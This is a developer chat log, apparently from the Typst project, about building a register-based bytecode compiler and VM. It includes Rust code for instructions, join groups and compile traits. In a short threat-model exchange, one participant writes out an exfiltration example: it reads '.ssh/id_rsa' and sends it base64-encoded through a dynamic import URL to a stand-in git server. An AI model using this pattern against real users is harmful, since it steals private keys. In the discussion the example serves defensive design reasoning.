  Join { lhs: Register(0), rhs: Register(4), target: Register(0) },
  Set { register: Register(5), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(5), target: Register(0) },
  Set { register: Register(6), value: ConstId(2) },
  Join { lhs: Register(0), rhs: Register(6), target: Register(0) },
  Set { register: Register(7), value: ConstId(3) },
  Join { lhs: Register(0), rhs: Register(7), target: Register(0) },
  LoadModule { module: ModuleId(0), local: LocalId(58), target: Register(8) },
  Args { target: Register(9) },
  Set { register: Register(10), value: ConstId(4) },
  ArgsPush { args: Register(9), value: Register(10) },
  Call { callee: Register(8), args: Register(9), target: Register(11), math: false, trailing_comma: false },
  Join { lhs: Register(0), rhs: Register(11), target: Register(0) },
  Set { register: Register(12), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(12), target: Register(0) }
]

#

What do y'all think?

#

(especially @left night @onyx furnace @tight glade @glossy shore and others that were interested like @sly pecan)

#

As you can see, all names, etc. are completely removed; indices are used instead, to try and make accesses much faster
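
The names-to-indices step could be sketched roughly as follows: names are looked up once at compile time and the runtime only ever indexes into a flat array. `CompileScope`, `LocalId` and `Locals` are illustrative names here, with `i64` standing in for real values.

```rust
use std::collections::HashMap;

/// Index of a local variable, handed out at compile time.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct LocalId(pub usize);

/// Compile-time only: maps names to indices.
#[derive(Default)]
pub struct CompileScope {
    ids: HashMap<String, LocalId>,
}

impl CompileScope {
    /// Returns the existing id for `name`, or assigns the next free one.
    pub fn declare(&mut self, name: &str) -> LocalId {
        let next = LocalId(self.ids.len());
        *self.ids.entry(name.to_string()).or_insert(next)
    }

    /// Looks up a name without declaring it.
    pub fn resolve(&self, name: &str) -> Option<LocalId> {
        self.ids.get(name).copied()
    }
}

/// Run-time storage: no names and no hashing, just a flat array.
pub struct Locals {
    values: Vec<i64>,
}

impl Locals {
    /// Creates storage for `count` locals, all initialised to zero.
    pub fn new(count: usize) -> Self {
        Self { values: vec![0; count] }
    }

    pub fn set(&mut self, id: LocalId, value: i64) {
        self.values[id.0] = value;
    }

    pub fn get(&self, id: LocalId) -> i64 {
        self.values[id.0]
    }
}
```

A lookup at run time is then a bounds-checked array access instead of a string hash and compare.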

untold turret Jan 20, 2024, 12:30 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

Is control flow already supported?

sturdy sequoia Jan 20, 2024, 12:30 PM

#

untold turret Is control flow already supported?

yes

#

chadYES

sly pecan Jan 20, 2024, 12:32 PM

#

sturdy sequoia (especially @left night @onyx furnace @tight glade ...

It's funny to me that you think I would understand anything of this 😀

sturdy sequoia Jan 20, 2024, 12:34 PM

#

untold turret Is control flow already supported?

The only things that are currently not supported:

- Show/Set rules
- Importing/Including modules
- Scoping: it currently only supports scoping for closures/functions but not blocks of code/content

#

Otherwise pretty much everything is implemented

#

show set rules I plan on supporting using a rule stack that changes the behaviour of the Join instruction because it's the easiest

#

And scoping is more about me being lazy 😂

onyx furnace Jan 20, 2024, 12:42 PM

#

how many registers do we have?

sturdy sequoia Jan 20, 2024, 12:43 PM

#

onyx furnace how many registers do we have?

Currently 32, but I don't know how many we really need

onyx furnace Jan 20, 2024, 12:43 PM

#

sturdy sequoia The only thing that are currently not supported: - Show/Set rules - Importing/In...

you are surprisingly fast!

#

does the number of regs matter? I don't know about bytecode design but I feel like there is not a 1:1 mapping between logical regs and physical ones

#

And I think we also have memory? (if we use up all the regs)

sturdy sequoia Jan 20, 2024, 12:45 PM

#

onyx furnace does the number of regs matter? I dont know about bytecode design but I feels li...

I mean yes because it's how much stack size and memory it will use

#

But apart from that, not really

untold turret Jan 20, 2024, 12:45 PM

#

I think they all are in memory. And we may not have to bind them to physical registers in initial impl.

sturdy sequoia Jan 20, 2024, 12:46 PM

#

untold turret I think they all are in memory. And we may not have to bind them to physical reg...

It's unlikely we could because there's quite a bit of state in the VM atm in addition to the registers themselves

#

the instructions are quite high level in order to reuse as much as possible

onyx furnace Jan 20, 2024, 12:48 PM

#

Would it be better if we have exactly 0 reg and only relies on stack? And we may do clever reg allocation things after we want to JIT/compile to native code.

sturdy sequoia Jan 20, 2024, 12:48 PM

#

pub struct Executor<'a> {
    /// The instructions to execute.
    instructions: &'a [Instruction],
    /// The spans in the instruction set.
    spans: &'a [Span],
    /// The labels in the instruction set.
    labels: &'a [usize],
    /// The constants in the instruction set.
    constants: &'a [Value],
    /// The closures in the instruction set.
    closures: &'a [CompiledClosure],
    /// The strings in the instruction set.
    strings: &'a [EcoString],
    /// The scopes used in the instruction set.
    scopes: Scopes<'a>,
    /// The locals used in the instruction set.
    locals: Vec<Value>,
    /// The captured locals used in the instruction set.
    captured: &'a [Value],
    /// The arguments used in the instruction set.
    arguments: &'a [Value],
    /// The current register table.
    registers: RegisterTable,
}


#[derive(Clone, Debug, PartialEq, Hash, Default)]
pub struct RegisterTable {
    pub registers: [Value; REGISTER_COUNT as usize],
}

sturdy sequoia Jan 20, 2024, 12:48 PM

#

onyx furnace Would it be better if we have exactly 0 reg and only relies on stack? And we may...

The idea of having registers instead of a stack is that it leads to fewer instructions and (hopefully) faster execution

#

Additionally, it makes the compiler insanely easy to write 😂

onyx furnace Jan 20, 2024, 12:50 PM

#

sounds like cisc vs risc😂

sturdy sequoia Jan 20, 2024, 12:52 PM

#

onyx furnace sounds like cisc vs risc😂

oh, it's a CISC 😂

#

Some instructions run a TON of code behind the scene lol

sly pecan Jan 20, 2024, 12:52 PM

#

HISC

sturdy sequoia Jan 20, 2024, 12:53 PM

#

Especially closure initialization

sly pecan Jan 20, 2024, 12:53 PM

#

humongous instruction set computer

sturdy sequoia Jan 20, 2024, 12:53 PM

#

sly pecan humongous instruction set computer

there's only around 50 instructions 😄

#

But each instruction is 32 bytes

untold turret Jan 20, 2024, 12:54 PM

#

sturdy sequoia Currently 32, but I don't know how many we really need

We may simply have infinite registers, and determine it then by the thesis. 😂

sturdy sequoia Jan 20, 2024, 12:54 PM

#

untold turret We may simply have infinite registers, and determine it then by the thesis. 😂

I think 32 should be fine 😂

#

maybe 64 but no more

#

note that currently locals are not stored in registers (which I admit is a bit weird)

#

My plan is to convert locals to registers soon™️

#

But I'd like the whole thing to work and be debugged first

untold turret Jan 20, 2024, 12:58 PM

#

Letting instructions use infinite registers would benefit static analysis. I don't know whether it introduces overhead in the bytecode compiler.

sturdy sequoia Jan 20, 2024, 12:58 PM

#

untold turret Make instructions having infinite registers brings benefits to static analysis. ...

to the compiler: no

#

currently the compiler actually uses infinite registers, then does a second pass to reuse registers and optimize

#

My goal with this is mostly to avoid using too much memory and to avoid allocating

#

but we could definitely do this without putting a hard cap on the number of registers

untold turret Jan 20, 2024, 12:59 PM

#

Sounds good

sturdy sequoia Jan 20, 2024, 1:00 PM

#

Like optimizing without limiting to 32 registers

#

My goal is also (maybe) to have multiple sizes of register pages and depending on the function use a bigger or smaller one among multiple sizes

#

to try and be as cache and memory efficient as possible
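
The "multiple sizes of register pages" idea could be as simple as picking the smallest size class that fits what the compiler says a function needs. The size classes below are invented for the example.

```rust
/// Hypothetical register page size classes, smallest first.
pub const PAGE_SIZES: [usize; 4] = [8, 16, 32, 64];

/// Smallest page that can hold `register_count` registers, or `None` if the
/// function needs more than the largest page (it would need some fallback).
pub fn page_size_for(register_count: usize) -> Option<usize> {
    PAGE_SIZES.iter().copied().find(|&size| size >= register_count)
}
```

Since the register-reuse pass already knows how many registers a function ends up needing, the page size could be decided once at compile time.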

untold turret Jan 20, 2024, 1:01 PM

#

We may also have comemo on executing blocks.

#

And use `Defer<T>` to send a sufficiently big batch of instructions to another thread to execute...

tight glade Jan 20, 2024, 1:04 PM

#

Like we could start by allocating 32 registers but grow as needed! I can take a deeper look this evening, where can i take a look at the implementation? ❤️

sturdy sequoia Jan 20, 2024, 1:04 PM

#

tight glade Like we could start by allocating 32 registers but grow as needed! I can take a ...

I haven't pushed it yet :-p

sturdy sequoia Jan 20, 2024, 1:04 PM

#

untold turret We may also have comemo on executing blocks.

that's my plan indeed 😄

untold turret Jan 20, 2024, 1:04 PM

#

So many crazy optimizations...

tight glade Jan 20, 2024, 1:05 PM

#

Istrs 😬

#

At that point just instructions 😂

tight glade Jan 20, 2024, 1:08 PM

#

untold turret We may simply have infinite registers, and determine it then by the thesis. 😂

By the thesis is my new expression ❤️

untold turret Jan 20, 2024, 1:09 PM

#

tight glade Like we could start by allocating 32 registers but grow as needed! I can take a ...

Wait, are you going to write bytecode manually in source code? Or what does "as needed" mean in this sentence?

sly pecan Jan 20, 2024, 1:15 PM

#

tight glade By the thesis is my new expression ❤️

😦

sturdy sequoia Jan 20, 2024, 1:15 PM

#

sly pecan 😦

I want to see that now lol

tight glade Jan 20, 2024, 2:00 PM

#

sly pecan 😦

Rewrite it in typst

#

Skillissue chat gpt

tight glade Jan 20, 2024, 2:01 PM

#

untold turret Wait, are you going to write bytecode manually in source code? Or what is as nee...

The bytecode is being written manually by dherse now in typst code base yea

#

But typst users will never see it

sturdy sequoia Jan 20, 2024, 2:19 PM

#

@untold turret @onyx furnace I actually really like the idea of having a variable number of registers, because it also removes the need to distinguish between: locals, captured, and arguments as being "special" cases which simplifies everything

#

So I think that as soon as it all works, I'll be implementing that way 😉

untold turret Jan 20, 2024, 2:23 PM

#

If we don't aim to utilize physical registers in "part 1", I think it is a really good decision. But I heard you had restricted the count, so I thought limiting the registers was easy.

sturdy sequoia Jan 20, 2024, 2:24 PM

#

untold turret If we don't target to utilize physical registers in "part 1", I think it is a re...

it's easy to limit them because a lot of values are not in registers but in special storages (like local variables, arguments, and captured values)

#

but if all of those need to be in registers, it makes the compilation much harder

#

because you'll need to reorder things just to make room

#

or have a stack

left night Jan 20, 2024, 3:02 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

Would it make sense to compile content blocks to a special template instruction rather than a lot of set + join? That way we can allocate space for the sequence beforehand and have less overhead in joining and Arc::get_mut.

sturdy sequoia Jan 20, 2024, 3:06 PM

#

left night Would it make sense to compile content blocks to a special template instruction ...

that's exactly what I am changing to 😉

#

I was already doing it because handling styles was basically impossible

#

The way it works is as follows:

Each markup, block, etc. creates a join group. While in a join group, the Join instruction basically appends the value to the group (which is pre-allocated to a size close enough to the output).
When a markup, block, etc. ends, it pops the join group, saving it to a register (as one big content).
Whenever a style rule is encountered, it does the same but pushes it into a StyledElem instead (so a special kind of join group).

#

If a join group is empty, it just produces an empty sequence elem, etc.

#

My idea is that we can therefore pre-allocate a lot, and then we can just build the sequence from the arrays (EcoVec) directly

#

Additionally, I have some smarts to handle subsequent show and set rules, where they get collected into a single Styles to try and save memory and decrease the depth of the final Content tree

#

I plan on writing a LOT of docs in the module to explain how it all works, and I have already commented basically every line of the compiler

#

Because the VM is actually quite complex, but this complexity is really aimed at improving performance

#

I also need to make the compiler use TrackedMut<Compiler> that way I can just #[comemo::memoize] each block 😄

left night Jan 20, 2024, 3:14 PM

#

sturdy sequoia I also need to make the compiler use `TrackedMut<Compiler>` that way I can just ...

Do you mean each individual [..] and {..} block?

sturdy sequoia Jan 20, 2024, 3:15 PM

#

left night Do you mean each individual `[..]` and `{..}` block?

Not sure yet, but maybe

#

I might just have two functions, one memoized and one not, and then decide which one to take based on the size
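
A rough sketch of that "pick the memoized or the plain path based on size" idea. It uses a plain `HashMap` as a stand-in cache rather than comemo, and the threshold, the `Evaluator` type, and the word-counting "evaluation" are all made up for illustration.

```rust
use std::collections::HashMap;

/// Hypothetical threshold (in bytes of source) below which caching
/// is assumed not to pay for its hashing and lookup overhead.
const MEMO_THRESHOLD: usize = 16;

struct Evaluator {
    /// Stand-in cache keyed by block source; comemo is not used here.
    cache: HashMap<String, usize>,
    /// Counts how often the real work ran, for illustration only.
    evaluations: usize,
}

impl Evaluator {
    fn new() -> Self {
        Self { cache: HashMap::new(), evaluations: 0 }
    }

    /// Stand-in for executing a block: it just counts words.
    fn eval_uncached(&mut self, block: &str) -> usize {
        self.evaluations += 1;
        block.split_whitespace().count()
    }

    /// Memoized path: look the block up first, evaluate only on a miss.
    fn eval_cached(&mut self, block: &str) -> usize {
        if let Some(&hit) = self.cache.get(block) {
            return hit;
        }
        let result = self.eval_uncached(block);
        self.cache.insert(block.to_string(), result);
        result
    }

    /// Dispatches on block size: small blocks skip the cache entirely.
    fn eval(&mut self, block: &str) -> usize {
        if block.len() < MEMO_THRESHOLD {
            self.eval_uncached(block)
        } else {
            self.eval_cached(block)
        }
    }
}
```

Small blocks are re-evaluated every time, while large blocks hit the cache on repeat calls.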

left night Jan 20, 2024, 3:16 PM

#

When a block has a lot of assignments, the mutable constraints will probably tank performance. If it's mostly pure, it could be okay.

sturdy sequoia Jan 20, 2024, 3:16 PM

#

left night When a block has a lot of assignments, the mutable constraints will probably tan...

Actually, I am not handling remote assignment and mutable methods yet 💀

#

Because it sounds... hard

left night Jan 20, 2024, 3:17 PM

#

What's remote assignment?

sturdy sequoia Jan 20, 2024, 3:17 PM

#

remote assignments = assignments in a parent scope

left night Jan 20, 2024, 3:17 PM

#

ah

sturdy sequoia Jan 20, 2024, 3:17 PM

#

can a closure do a mutable assignment (in the parent scope)?

#

I hope not 😄

left night Jan 20, 2024, 3:17 PM

#

Overall, I think caching less and smarter (not even every function call) might be more the way to go. Less hashing, lookup, constraint, and memory overhead

left night Jan 20, 2024, 3:17 PM

#

sturdy sequoia can a closure do a mutable assignment (in the parent scope)?

No, that would be impure

sturdy sequoia Jan 20, 2024, 3:17 PM

#

left night No, that would be impure

Thank you

#

'cause I was worried 😂

#

Then mutable assignments should be relatively easy

#

Just need a Scopes::enter and Scopes::exit call and then it's good 😄

left night Jan 20, 2024, 3:21 PM

#

sturdy sequoia But each instruction is 32 bytes

did it grow from 8 bytes to 32 bytes?

glossy shore Jan 20, 2024, 3:24 PM

#

sturdy sequoia But each instruction is 32 bytes

🙀

glossy shore Jan 20, 2024, 3:25 PM

#

sturdy sequoia What do y'all think?

I wonder why we have to load a module as a value? Couldn't that stay outside of runtime

left night Jan 20, 2024, 3:26 PM

#

perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes and then one supplemental maybe Vec<u32> for common index arguments and then something for rarer arguments. but it starts complicating things more.

#

By the way, I suspect import "..": * is gonna be a pain to implement

#

Right now the imported string can even be dynamic, but I'm thinking about forbidding that. For import, I think almost nobody uses it, but for include some people do. Not sure.

#

It's also a security concern should we allow some sort of URL imports: #1176122103355953162 message

glossy shore Jan 20, 2024, 3:29 PM

#

And exactly how comemo-able is this bytecode?

glossy shore Jan 20, 2024, 3:30 PM

#

left night perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes ...

cache locality will significantly improve then

glossy shore Jan 20, 2024, 3:32 PM

#

left night By the way, I suspect `import "..": *` is gonna be a pain to implement

Shouldn't all scoping just be resolved at comptime

left night Jan 20, 2024, 3:34 PM

#

glossy shore Shouldn't all scoping just be resolved at comptime

That's only possible if the ".." is known then

glossy shore Jan 20, 2024, 3:41 PM

#

sturdy sequoia Like optimizing without limiting to 32 registers

I think given the different constraints we're under this would make sense, it's not like registers have any real advantage over stack / heap for us

glossy shore Jan 20, 2024, 3:42 PM

#

sturdy sequoia My goal is also (maybe) to have multiple sizes of register pages and depending o...

I think int registers, string registers, array registers etc. could definitely be useful

#

we could also allocate it all at once beforehand

sturdy sequoia Jan 20, 2024, 3:47 PM

#

left night did it grow from 8 bytes to 32 bytes?

yes 😂 Because some instructions contain a span, but it's useless so I plan on removing it

sturdy sequoia Jan 20, 2024, 3:49 PM

#

left night By the way, I suspect `import "..": *` is gonna be a pain to implement

Indeed, I don't know yet how to do it 💀

#

I am thinking of compiling and evaluating on-the-fly and cross my fingers that it's enough

sturdy sequoia Jan 20, 2024, 3:49 PM

#

glossy shore And exactly how comemo-able is this bytecode?

the bytecode is copy, it only contains numbers (pretty much)

sturdy sequoia Jan 20, 2024, 3:50 PM

#

left night That's only possible if the `".."` is known then

ah right, that's indeed an issue, I might just forbid it for the time being

#

for include it's fine because I can just evaluate it at runtime (relying on comemo for fast compilation)

#

but letting import be dynamic is a big no-no

glossy shore Jan 20, 2024, 3:50 PM

#

sturdy sequoia the bytecode is copy, it only contains numbers (pretty much)

But like the execution of it

#

as it's linear

sturdy sequoia Jan 20, 2024, 3:51 PM

#

left night It's also a security concern _should_ we allow some sort of URL imports: https:/...

I think that it makes sense to allow things like git repos and stuff like that, but my problem is more that packages might use it, and that's an even bigger no-no

left night Jan 20, 2024, 3:52 PM

#

sturdy sequoia I think that it makes sense to allow things like git repos and stuff like that, ...

but even if you allow a git repo, the URL should be static

#

my problem is that if the URL is dynamic (even if it's a git URL), you can exfiltrate arbitrary data via the URL

glossy shore Jan 20, 2024, 3:53 PM

#

what exactly is the attack vector here?

left night Jan 20, 2024, 3:55 PM

#

glossy shore what exactly is the attack vector here?

let's assume typst is executed in your home dir, so the whole home dir becomes part of the project. Then you let id = read(".ssh/id_rsa"), and call import "my.git.server/" + base64(id).

#

The whole read ssh keys, embed them into the PDF in some invisible way and get the person to send you the PDF is imo not that big of a deal. but this here would be a pretty big attack surface imo.

sturdy sequoia Jan 20, 2024, 3:57 PM

#

Ok, I reduced instructions to 16 bytes

sturdy sequoia Jan 20, 2024, 3:57 PM

#

left night my problem is that if the URL is dynamic (even if it's a git URL), you can exfil...

that's true

sturdy sequoia Jan 20, 2024, 3:57 PM

#

left night The whole read ssh keys, embed them into the PDF in some invisible way and get t...

I still think it's a genuine attack vector and it makes me glad that we have proper path sanitization

#

But indeed, leaking stuff through URLs would be 100x worse

#

I brought it down to 12 bytes

#

and that's bigger than I'd like

#

but it's pretty good

left night Jan 20, 2024, 4:02 PM

#

what do you think of SOA for instructions (struct of arrays)?

sturdy sequoia Jan 20, 2024, 4:07 PM

#

left night what do you think of SOA for instructions (struct of arrays)?

I'm not too sure what you mean by that 🤔

#

I meant to ask for clarifications but then I forgot

#

like just having an array of u8 and decoding instructions on the fly?

left night Jan 20, 2024, 4:09 PM

#

sturdy sequoia I'm not too sure what you mean by that 🤔

https://en.wikipedia.org/wiki/AoS_and_SoA

sturdy sequoia Jan 20, 2024, 4:14 PM

#

left night <https://en.wikipedia.org/wiki/AoS_and_SoA>

yes I know, but I don't understand in the context of instructions

#

Ok, I found the culprit and it's now down to 8 bytes

#

That means that each cache line can contain 8 instructions, I'd argue that's about as good as it gets
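
A small sketch of how the 8-byte figure can be checked, assuming 16-bit register indices and a 64-byte cache line (common on x86-64, not universal). The variants are illustrative and are not the real instruction set.

```rust
use std::mem::size_of;

/// Hypothetical 16-bit register index.
#[derive(Clone, Copy)]
#[repr(transparent)]
struct Register(u16);

/// Illustrative instruction set. `repr(u8)` gives a defined layout:
/// a one-byte tag followed by the fields of the active variant.
#[derive(Clone, Copy)]
#[repr(u8)]
enum Instruction {
    Set { value: u16, register: Register },
    Join { value: Register },
    Add { lhs: Register, rhs: Register, target: Register },
    Jump { offset: u32 },
}

/// Assumed cache line size in bytes.
const CACHE_LINE: usize = 64;

/// Number of instructions that fit into one assumed cache line.
const fn instructions_per_cache_line() -> usize {
    CACHE_LINE / size_of::<Instruction>()
}
```

With this layout, a single variant carrying an 8-byte field such as a `u64` would push the whole enum to 16 bytes. That fits the earlier observation that an embedded span was what made the instructions bigger.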

left night Jan 20, 2024, 4:20 PM

#

sturdy sequoia yes I know, but I don't understand in the context of instructions

In the context of instructions, I meant that opcodes are a separate array from arg1, from arg2 etc.

#

Since not every instruction has the same structure, it would require some cleverness
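
One possible shape for such a struct-of-arrays layout, as a sketch only: opcodes go into one vector, all arguments into a second one, and each opcode's arity says how many arguments to consume. `Opcode`, `Program`, and the arities are hypothetical.

```rust
/// Hypothetical opcodes, one byte each.
#[derive(Debug, Clone, Copy, PartialEq)]
#[repr(u8)]
enum Opcode {
    Set,
    Join,
    Add,
}

impl Opcode {
    /// Number of `u32` arguments each opcode consumes.
    fn arity(self) -> usize {
        match self {
            Opcode::Set => 2,
            Opcode::Join => 1,
            Opcode::Add => 3,
        }
    }
}

/// Struct-of-arrays program: opcodes and arguments live in separate vectors.
#[derive(Default)]
struct Program {
    opcodes: Vec<Opcode>,
    args: Vec<u32>,
}

impl Program {
    /// Appends one instruction, checking the argument count.
    fn push(&mut self, op: Opcode, args: &[u32]) {
        assert_eq!(args.len(), op.arity(), "wrong argument count");
        self.opcodes.push(op);
        self.args.extend_from_slice(args);
    }

    /// Iterates over `(opcode, arguments)` pairs by walking both arrays.
    fn iter(&self) -> impl Iterator<Item = (Opcode, &[u32])> + '_ {
        let mut cursor = 0;
        self.opcodes.iter().map(move |&op| {
            let end = cursor + op.arity();
            let slice = &self.args[cursor..end];
            cursor = end;
            (op, slice)
        })
    }
}
```

The "cleverness" shows up in decoding. Arguments can only be located by walking the program from the start, so jumps would need to store an argument offset alongside the opcode index.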

#

But 8 bytes is pretty good

sturdy sequoia Jan 20, 2024, 4:31 PM

#

left night But 8 bytes is pretty good

I think so too

#

I kind of want to keep it reasonably simple for when I have to debug it 😂

#

BTW @left night how can I chain two Styles

#

As in, I already have a style and I want to add one more

#

(some cleverness to avoid nested StyledElem)

feral imp Jan 20, 2024, 4:31 PM

#

@atomic violet isn't this stuff more like your speed?

left night Jan 20, 2024, 4:48 PM

#

sturdy sequoia (some cleverness to avoid nested `StyledElem`)

content.styled(..) will do this flattening automatically. it is based on Styles::apply.

sturdy sequoia Jan 20, 2024, 4:51 PM

#

left night `content.styled(..)` will do this flattening automatically. it is based on `Styl...

I mean I do care for one reason: that's the only place where I'm allocating in the vm

#

And I want to keep allocations to the bare minimum if I can avoid it

#

But of course we can revisit it once it actually works

#

Only things missing now are import, include and a few instructions like the ability to store in remote contexts, and the ability to run iterators (for x in y)

#

for which the instructions are there, they're just not implemented

feral imp Jan 20, 2024, 4:55 PM

#

Amazing. At least someone is dedicating their weekend to typst. A hero amongst mortals.

sturdy sequoia Jan 20, 2024, 4:55 PM

#

Oh, and destructuring values is not yet implemented either!

feral imp Jan 20, 2024, 4:55 PM

#

I retract my praise then.

atomic violet Jan 20, 2024, 5:10 PM

#

feral imp <@284257720406638594> isn't this stuff more like your speed?

It might be, but I haven't dug into typst deep enough to contribute anything at the moment 😭

tight glade Jan 20, 2024, 5:17 PM

#

sturdy sequoia Oh, and destructuring values is not yet implemented either!

That's probably equivalent to elegantly changing the meaning of a few Registers 😇

#

Which is hella cute

sturdy sequoia Jan 20, 2024, 5:18 PM

#

I have done it like this:
destructuring takes a pattern, the pattern indicates in which locals to store values

#

pretty rudimentary atm
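
A minimal sketch of what "the pattern indicates in which locals to store values" could look like, assuming only flat array destructuring. `Value`, `PatternItem`, and `destructure` are hypothetical names, not the actual implementation.

```rust
/// Hypothetical value type.
#[derive(Debug, Clone, PartialEq)]
enum Value {
    None,
    Int(i64),
    Array(Vec<Value>),
}

/// One element of a destructuring pattern.
enum PatternItem {
    /// Store the value at this position into the given local slot.
    Local(usize),
    /// Ignore the value at this position (like `_`).
    Skip,
}

/// Destructures `value` into `locals` according to `pattern`.
/// Panics if a pattern refers to a local slot that does not exist.
fn destructure(
    value: &Value,
    pattern: &[PatternItem],
    locals: &mut [Value],
) -> Result<(), String> {
    let Value::Array(items) = value else {
        return Err("cannot destructure a non-array value".to_string());
    };
    if items.len() != pattern.len() {
        return Err(format!(
            "expected {} elements, found {}",
            pattern.len(),
            items.len()
        ));
    }
    for (item, slot) in items.iter().zip(pattern) {
        if let PatternItem::Local(index) = slot {
            locals[*index] = item.clone();
        }
    }
    Ok(())
}
```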

tight glade Jan 20, 2024, 5:24 PM

#

If the values are already stored somewhere we can just change which register is pointing to it right?

atomic violet Jan 20, 2024, 5:24 PM

#

sturdy sequoia Ok, so the compiler mostly works, the following code gets compiled into: ```ts =...

ackshually, I have a question, what does Join do?

sturdy sequoia Jan 20, 2024, 5:29 PM

#

atomic violet ackshually, I have a question, what does `Join` do?

it joins values into a bigger value

#

it's the joining mechanism in typst

#

like joining multiple pieces of content into one big content

atomic violet Jan 20, 2024, 5:29 PM

#

I guessed that much, but what does it do on the inside? Like create a tree node, or push to a vector of things to join, or ...?

sturdy sequoia Jan 20, 2024, 5:30 PM

#

atomic violet I guessed that much, but what does it do in the inside? Like create a tree node,...

push to a vector of things

#

but it has the concept of a context, which is a vector of vectors to handle nested joining

atomic violet Jan 20, 2024, 5:31 PM

#

why is its signature so weird then? shouldn't it only have "where to push" and "what to push" arguments? Like lhs += rhs instead of target = lhs + rhs?

sturdy sequoia Jan 20, 2024, 5:31 PM

#

atomic violet why is it signature so weird then? shouldn't it only have "where to push" and "w...

yes, before it didn't have that feature

#

now it would just be Push(capacity), Join(what_to_add), Pop(where_to_store)

#

    /// Push a new join group.
    JoinGroup {
        /// The capacity hint of the join group.
        capacity: u16,
    },
    /// Pop a join group.
    PopGroup {
        /// The register in which to store the result.
        target: Register,
    },
    /// Join a value into the current join group.
    Join {
        /// The value to add to the join group.
        value: Register,
    },
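
How these three instructions might behave at runtime can be sketched as a stack of pre-allocated vectors. This is an illustration under assumptions: `Content` and `Joiner` are hypothetical stand-ins, and the real VM stores the popped result in a register rather than returning it.

```rust
/// Hypothetical content type: plain text or a flat sequence.
#[derive(Debug, Clone, PartialEq)]
enum Content {
    Text(String),
    Sequence(Vec<Content>),
}

/// Stack of join groups ("a vector of vectors" for nested joining).
#[derive(Default)]
struct Joiner {
    groups: Vec<Vec<Content>>,
}

impl Joiner {
    /// `JoinGroup { capacity }`: open a new, pre-allocated group.
    fn push_group(&mut self, capacity: u16) {
        self.groups.push(Vec::with_capacity(capacity as usize));
    }

    /// `Join { value }`: append a value to the innermost group.
    fn join(&mut self, value: Content) {
        self.groups
            .last_mut()
            .expect("no open join group")
            .push(value);
    }

    /// `PopGroup { target }`: close the innermost group and produce
    /// one content. An empty group yields an empty sequence.
    fn pop_group(&mut self) -> Content {
        let items = self.groups.pop().expect("no open join group");
        Content::Sequence(items)
    }
}
```

Nested markup or blocks map onto nested `push_group` / `pop_group` pairs, with the inner result joined into the outer group.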

atomic violet Jan 20, 2024, 5:32 PM

#

ah, i see, that makes more sense

sturdy sequoia Jan 20, 2024, 5:33 PM

#

atomic violet ah, i see, that makes more sense

yes, styles are also just special join groups that carry a style

#

styles = show and set rules

#

I've tried to make things fairly simple and clever

#

but there ends up being quite a few moving parts

#

But I think it's okay

#

Because I'm trying to reuse as much of the existing logic as possible, most notably all of the ops::... like ops::add(rhs, lhs) that already exist in the code base

sturdy sequoia Jan 20, 2024, 6:08 PM

#

@left night do we want to keep this feature:

        if let Some(sink_name) = sink_name {
            if let Some(sink_pos_values) = sink_pos_values {
                remaining_args.items.extend(sink_pos_values);
            }
            vm.define(sink_name, remaining_args);
        }

#

If a sink is unnamed, the other arguments get defined as variables in the scope

#

This feels very error prone?

#

And is basically completely incompatible with my design 😦

glad urchin Jan 20, 2024, 6:24 PM

#

sturdy sequoia <@311948531835469827> do we want to keep this feature: ```rs if let Some...

context: https://github.com/typst/typst/pull/2984

GitHub

Fix unnamed sinks not capturing named args by PgBiel · Pull Request...

Fixes #2983
The problem was a tiny oopsie in the eval::call_closure code, where sink was an Option<Ident<'a>> (it would be Some, and thus the named arg capturing code would execute,...

sturdy sequoia Jan 20, 2024, 6:27 PM

#

glad urchin context: https://github.com/typst/typst/pull/2984

yes, but is that feature useful in any way outside of that bug?

glad urchin Jan 20, 2024, 6:28 PM

#

uh

#

well

#

the idea is that you should be able to take any args without caring about them

#

that's all

sturdy sequoia Jan 20, 2024, 6:28 PM

#

For now I'll just treat .. as "discard everything else"

glad urchin Jan 20, 2024, 6:28 PM

#

yea thats exactly what it is

#

not sure if i understand then

sturdy sequoia Jan 20, 2024, 6:28 PM

#

yes figures, because it defines the variables which is super weird

glad urchin Jan 20, 2024, 6:28 PM

#

what's the issue?

glad urchin Jan 20, 2024, 6:28 PM

#

sturdy sequoia yes figures, because it defines the variables which is super weird

only if it's named though

sturdy sequoia Jan 20, 2024, 6:28 PM

#

ah no

#

okay

#

my bad

#

I had misunderstood the code, it was a bit confusing with the if let Some(..) = .. everywhere 😂

glad urchin Jan 20, 2024, 6:29 PM

#

:p

#

happens

sturdy sequoia Jan 20, 2024, 6:29 PM

#

ok, so it's the right way 😄

glad urchin Jan 20, 2024, 6:29 PM

#

but yeah you can just throw it all away

sturdy sequoia Jan 20, 2024, 6:47 PM

#

glad urchin but yeah you can just throw it all away

Sorry to say, but...

#

it's...

#

kind of the point 😄

#

throwing all of the eval code into a volcano 😄

#

😈

#

firemc

tight glade Jan 20, 2024, 7:07 PM

#

Question, when we want to change the evaluation, will we have to work with your new bytecode already or is there some level of abstraction?

Like, is the eval trait still a thing? Does it return bytecode now?

sturdy sequoia Jan 20, 2024, 7:16 PM

#

tight glade Question, when we want to change the evaluation , will we have to work with your...

Now there is the Compile trait, which receives the &mut Compiler as an argument. It must push all of its instructions (with spans) into it (I will make a nicer functional API once it all works) and return a SourceResult<Register>, the Register being where the output of that operation is stored.

#

Note that the output may very well be Register::NONE in which case it means it returns nothing

#

As an example:

#

impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()).into_value(),
        );
        let register = compiler.reg();

        compiler.spans.push(self.span());
        compiler.instructions.push(Instruction::Set { value, register });

        Ok(register)
    }
}

#

Here is how ' in an equation gets compiled

#

later on, I plan on replacing the manual span and instruction push with:

#

compiler.set(self.span(), value, register);

#

Which I think will be much nicer

#

Same with removing the .into_value() by making const_ take an impl IntoValue instead

#

Which would lead to:

#

impl Compile for ast::MathPrimes<'_> {
    fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
        let value = compiler.const_(
            PrimesElem::new(self.count()).pack().spanned(self.span()),
        );
